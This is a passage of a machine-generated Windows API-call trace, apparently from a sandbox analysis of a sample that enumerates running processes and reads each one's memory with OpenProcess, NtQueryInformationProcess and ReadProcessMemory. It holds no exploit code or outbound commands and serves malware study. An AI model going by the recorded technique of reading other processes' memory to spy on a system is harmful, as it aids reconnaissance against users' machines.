lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.122] free (_Block=0xd9d190) [0264.123] CloseHandle (hObject=0x28c) returned 1 [0264.126] _ui64tow_s (in: _Value=0xd58, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3416") returned 0x0 [0264.127] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3416") returned 4 [0264.127] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.127] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.128] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd58) returned 0x28c [0264.128] GetLastError () returned 0x0 [0264.128] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.128] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x382018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.128] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.128] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x403420, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.129] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x403078, lpBuffer=0x138c580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.129] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.129] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.129] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x382020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.129] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x402a60, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.130] malloc (_Size=0x6a) returned 0xd9cc30 [0264.130] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4030b8, lpBuffer=0xd9cc30, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.130] free (_Block=0xd9cc30) [0264.131] CloseHandle (hObject=0x28c) returned 1 [0264.193] _ui64tow_s (in: _Value=0xe18, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3608") returned 0x0 [0264.193] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3608") returned 4 [0264.194] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0xa908ec4f, dwBuildNumber=0x7ffd, dwPlatformId=0x138cb30, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.194] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.195] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe18) returned 0x28c [0264.195] GetLastError () returned 0x0 [0264.195] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.195] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x344018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.195] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.195] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x471b60, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.195] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4717a8, lpBuffer=0x138c580, nSize=0x4c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.195] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.195] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.195] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x344020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.195] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x471190, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.196] malloc (_Size=0x76) returned 0xd9cc30 [0264.196] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4717f4, lpBuffer=0xd9cc30, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.196] free (_Block=0xd9cc30) [0264.196] CloseHandle (hObject=0x28c) returned 1 [0264.197] _ui64tow_s (in: _Value=0xee4, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3812") returned 0x0 [0264.197] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3812") returned 4 [0264.197] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.197] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.198] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xee4) returned 0x28c [0264.198] GetLastError () returned 0x0 [0264.198] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.198] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x38d018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.199] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.199] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x491c20, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.199] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x491848, lpBuffer=0x138c580, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.199] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.200] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.200] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x38d020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.200] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x491230, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.200] malloc (_Size=0x72) returned 0xd9cc30 [0264.200] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4918a2, lpBuffer=0xd9cc30, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.201] free (_Block=0xd9cc30) [0264.201] CloseHandle (hObject=0x28c) returned 1 [0264.201] _ui64tow_s (in: _Value=0x4c8, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1224") returned 0x0 [0264.202] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1224") returned 4 [0264.202] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.202] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.203] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x28c [0264.203] GetLastError () returned 0x0 [0264.203] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.203] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x26c018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.203] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.203] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x531b10, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.204] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5317a8, lpBuffer=0x138c580, nSize=0x52, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.204] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.204] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.204] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x26c020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.204] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x531190, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.205] malloc (_Size=0x2c) returned 0xdb11c0 [0264.205] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5317fa, lpBuffer=0xdb11c0, nSize=0x2a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb11c0*, lpNumberOfBytesRead=0x0) returned 1 [0264.205] free (_Block=0xdb11c0) [0264.206] CloseHandle (hObject=0x28c) returned 1 [0264.206] _ui64tow_s (in: _Value=0x7bc, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1980") returned 0x0 [0264.206] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1980") returned 4 [0264.206] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.206] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.208] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7bc) returned 0x28c [0264.208] GetLastError () returned 0x0 [0264.208] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.208] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2f7018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.208] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.208] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5f1b60, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.209] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5f17a8, lpBuffer=0x138c580, nSize=0x4c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.209] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.209] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.209] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2f7020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.210] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5f1190, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.210] malloc (_Size=0x64) returned 0xdb03b0 [0264.210] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5f17f4, lpBuffer=0xdb03b0, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb03b0*, lpNumberOfBytesRead=0x0) returned 1 [0264.210] free (_Block=0xdb03b0) [0264.211] CloseHandle (hObject=0x28c) returned 1 [0264.211] _ui64tow_s (in: _Value=0x948, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="2376") returned 0x0 [0264.212] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="2376") returned 4 [0264.212] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.212] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.213] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x948) returned 0x28c [0264.213] GetLastError () returned 0x0 [0264.213] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.213] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x260018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.213] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.213] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4d1cc0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.214] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4d18d8, lpBuffer=0x138c580, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.214] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.214] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.214] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x260020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.214] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4d12c0, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.215] malloc (_Size=0x7e) returned 0xd9d190 [0264.215] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4d1938, lpBuffer=0xd9d190, nSize=0x7c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.215] free (_Block=0xd9d190) [0264.216] CloseHandle (hObject=0x28c) returned 1 [0264.216] _ui64tow_s (in: _Value=0xd74, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3444") returned 0x0 [0264.217] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3444") returned 4 [0264.217] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.217] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.218] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd74) returned 0x28c [0264.218] GetLastError () returned 0x0 [0264.219] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.219] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x56b018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.219] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.219] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x271c40, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.219] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x271888, lpBuffer=0x138c580, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.220] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.220] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.220] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x56b020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.220] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x271270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.220] malloc (_Size=0x60) returned 0xdb0420 [0264.220] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2718e0, lpBuffer=0xdb0420, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb0420*, lpNumberOfBytesRead=0x0) returned 1 [0264.221] free (_Block=0xdb0420) [0264.221] CloseHandle (hObject=0x28c) returned 1 [0264.222] _ui64tow_s (in: _Value=0xe08, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3592") returned 0x0 [0264.222] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3592") returned 4 [0264.222] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.222] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.223] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe08) returned 0x28c [0264.223] GetLastError () returned 0x0 [0264.252] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.253] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2c3018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.253] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.253] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x471ce0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.253] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x471888, lpBuffer=0x138c580, nSize=0x8a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.254] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.254] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.254] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2c3020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.254] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x471270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.254] malloc (_Size=0x92) returned 0xd9d190 [0264.254] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x471912, lpBuffer=0xd9d190, nSize=0x90, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.255] free (_Block=0xd9d190) [0264.255] CloseHandle (hObject=0x28c) returned 1 [0264.256] _ui64tow_s (in: _Value=0xc10, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3088") returned 0x0 [0264.256] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3088") returned 4 [0264.256] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: 